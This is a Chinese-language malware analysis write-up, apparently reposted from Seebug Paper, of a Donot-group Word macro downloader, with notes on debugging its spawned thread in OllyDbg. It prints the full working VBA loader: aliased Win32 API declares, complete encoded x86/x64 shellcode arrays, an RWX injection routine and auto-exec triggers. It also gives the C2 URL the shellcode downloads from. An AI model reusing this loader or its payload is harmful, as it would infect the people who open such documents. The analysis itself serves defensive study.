OD 调试宏代码中的新线程

作者:Yenn_
原文链接: https://0xdf1001f.github.io/2021/02/23/OD%E8%B0%83%E8%AF%95%E5%AE%8F%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%96%B0%E7%BA%BF%E7%A8%8B/

donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588

基本信息

File Name File Size File Type MD5
fees_10_to_12-copy.doc 46,119 Bytes Downloader 7a6559ff13f2aecd89c64c1704a68588

样本是一个带有宏代码的.doc文档,文档内无诱饵内容,代码部分被加密

样本分析

donot - fees_10_to_12-copy.doc

将宏代码提取后:

' Win32 imports used by the loader Sub below. Each Declare is bound to an
' obfuscated VBA name and the real export only appears in the Alias clause, so
' an identifier search for "VirtualAlloc" / "CreateRemoteThread" finds nothing;
' when triaging, key on the Lib/Alias strings instead.
'   JiJJJJLjIiLiliLl -> CreateRemoteThread (imported from kernelbase rather than
'                       kernel32 -- presumably to dodge naive "kernel32" matching)
'   liljJjliiJIiiilL -> VirtualAlloc
'   JlljIIIiILjliJJj -> RtlMoveMemory
' The VBA7 branch adds PtrSafe/LongPtr so the same module loads in 64-bit Office;
' the #Else branch keeps the legacy Long signatures for older 32-bit hosts.
#If VBA7 Then
    Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
    Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
    Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
    Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
    Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
    Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If

' Loader: picks an architecture-specific byte array, allocates RWX memory in
' the Office process, copies the bytes in one at a time and starts a thread on
' them. Nothing is written to disk and no second process is spawned, which is
' why the write-up switches to attaching a debugger to WINWORD.exe.
' Detection note: aliased Declares of VirtualAlloc/RtlMoveMemory/CreateRemoteThread
' plus a large numeric Array() reached from an auto-exec Sub is a high-signal
' combination for static (YARA / AMSI) rules.
Sub iIljILiiJILLlljL()
    ' jLlJLiiLjliLIIiL = x86 payload, ILlIjjlLJJJJlJIJ = x64 payload,
    ' IiJlLIlJIjIJJIiI = whichever of the two is selected below.
    Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
    #If VBA7 Then
        Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
    #Else
        Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
    #End If

    ' Encoded payloads. Reading the leading bytes, each array appears to start with a
    ' small self-decoding stub: the x86 one does mov edi,edi / push ebp / mov ebp,esp,
    ' then fldpi; fnstenv [esp-0Ch]; pop ebp (a GetPC trick) and NOT + XOR 0FDh over
    ' 3BCh bytes starting at offset 25h; the x64 one does the same with call/pop and
    ' 44Ch bytes from offset 2Fh. NOT followed by XOR 0FDh is just XOR 02h, which is
    ' why the trailing runs of 2 are zero padding and why the "106, 118, 118, 114, 56,
    ' 45, 45, ..." sequence near the end of each array reads "http://..." once decoded
    ' (the C2 URL given later in the write-up). Verify against a full disassembly.
    jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
                        253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
                        234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
                        102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
                        81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
    ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
                        71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
                        2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
                        2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
                        103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
                        85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)

    ' Select the payload for the bitness of the Office host that runs the macro.
    #If Win64 Then
        IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
    #Else
        IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
    #End If

    ' VirtualAlloc(NULL, UBound(payload), MEM_COMMIT = &H1000, PAGE_EXECUTE_READWRITE = &H40).
    ' Size is UBound rather than UBound + 1, so the last element is never copied; it is
    ' part of the zero padding, so that does not matter here. An RWX allocation from an
    ' Office process is itself a useful telemetry signal.
    iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
    ' Copy one byte per iteration: each array element is widened into a Long/LongPtr
    ' and RtlMoveMemory then moves only its low byte (length argument is 1).
    For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
        jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
        lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
    Next JlLiLJjLjiJlllIi
    ' CreateRemoteThread with hProcess = -1 (the GetCurrentProcess pseudo-handle) and
    ' lpStartAddress = the buffer above, i.e. the shellcode runs on a new thread inside
    ' WINWORD.exe. The handle is discarded and nothing waits on the thread, so the Sub
    ' returns at once; this is the line to break on before attaching a debugger.
    ' (The trailing ";创建新线程" is the original author's annotation, not VBA syntax.)
    lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0);创建新线程

End Sub

' Auto-exec entry point. VBA procedure names are case-insensitive, so "AutooPEN"
' is Word's AutoOpen and fires when the document is opened with macros enabled;
' the odd casing only defeats case-sensitive string matching on "AutoOpen".
Sub AutooPEN()
    iIljILiiJILLlljL
End Sub
' Second auto-exec entry point, same case trick as above. Workbook_Open is an
' Excel event handler, so in this .doc it should not fire -- presumably left in
' by a builder shared with an .xls variant of the lure; worth checking for one.
Sub WOrkBook_OPen()
    iIljILiiJILLlljL
End Sub

通过阅读宏代码,得知样本的大意为硬编码的数据,解密出一段Shellcode并在自身中创建新线程执行。

在创建线程的地方下断,“iIJIllLIliILJIll”为新线程函数地址,通过调试得到这次的内存地址为“322371584”,转为HEX为“1337 0000”。

通过阅读宏代码,得知样本的大意为硬编码的数据,解密出一段Shellcode并在自身中创建新线程执行。

在创建线程的地方下断,“iIJIllLIliILJIll”为新线程函数地址,通过调试得到这次的内存地址为”322371584”,转为HEX为”1337 0000”。

这里创建新线程后,代码进入了新线程内,Office内的调试器不能调试,OD忽略所有异常然后附加进程”WINWORD.exe”,跳转前面的函数地址,来到写入的Shellcode地址,修改EIP到代码起始位置,开始调试。

New Thread

解密算法:

解密获取到VirtualAlloc的地址并调用,申请一块内存,通过硬编码写入数据,再次解密出需要使用的函数地址。

尝试从C2地址下载文件“http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico”

截至分析时,下载的文件已失效


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1508/


